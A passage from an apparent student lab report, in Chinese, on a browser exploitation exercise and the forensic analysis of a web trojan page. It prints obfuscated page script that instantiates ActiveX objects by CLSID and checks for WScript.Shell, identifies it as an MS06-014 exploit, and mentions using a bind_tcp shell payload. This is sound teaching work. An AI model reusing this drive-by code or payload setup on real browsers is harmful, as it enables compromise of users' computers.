'{'+'0'+'0'+'0'+'6'+'F'+'0'+'3'+'3'+'-'+'0'+'0'+'0'+'0'+'-'+'0'+'0'+'0'+'0'+'-'+'C'+'0'+'0'+'0'+'-'+'0'+'0'+'0'+'0'+'0'+'0'+'0'+'0'+'0'+'0'+'4'+'6'+'}',
'{'+'0'+'0'+'0'+'6'+'F'+'0'+'3'+'A'+'-'+'0'+'0'+'0'+'0'+'-'+'0'+'0'+'0'+'0'+'-'+'C'+'0'+'0'+'0'+'-'+'0'+'0'+'0'+'0'+'0'+'0'+'0'+'0'+'0'+'0'+'4'+'6'+'}',null);
while(t[i])
{vara=null;
if(t[i].substring(0,1)=='{')
{a=document.createElement("object");
a.setAttribute("cl"+"as"+"sid","cl"+"s"+"id"+":"+t[i].substring(1,t[i].length-1));}
else{try{a=newActiveXObject(t[i]);}catch(e){}}
if(a)
{try{varb=pVcQptuXtURkI(a,"W"+"Sc"+"ri"+"pt"+".S"+"he"+"ll");if(b){KICnWOyGLGaPMnBBSTFqivHOpkic(a);return(0);}}
catch(e){}}i++;}}
</script></head><bodyonload='KgYOUdGGjoLHKdVQmjepXovpiiN()'>KlfoGjq</body></html>

閱讀程式碼,可以看到其中使用到document.location載入了payload,並且下一行中後面跟了一個可執行檔案ujOvdPBAnxoLeaHiExeg.exe,猜想這個可執行檔案應該是以攻擊機為伺服器,通過網頁下載到靶機上的:

開啟靶機工作管理員檢視正在執行的程序,能夠發現出現的那個可執行檔案:

看var t=newArray後面跟著的資料,去除引號和加號之後,可以得到:

通過查詢這些內容便可以知道這是利用了MS06014的漏洞。

三、學習中遇到的問題及解決

  • 問題1:做第一個實驗時攻擊一直失敗
  • 問題1解決方案:更換payload之後攻擊成功,windows/shell/bind_tcp
  • 問題2:做第二個實驗時僅僅依靠參考檔案不能很好的動手分析操作
  • 問題2解決方案:使用其他同學提供的原始檔

四、實踐總結

本次實踐動手實現了web瀏覽器滲透攻擊,網頁木馬的分析取證,有一定的難度,尤其是網頁木馬的取證分析,涉及很多知識和工具。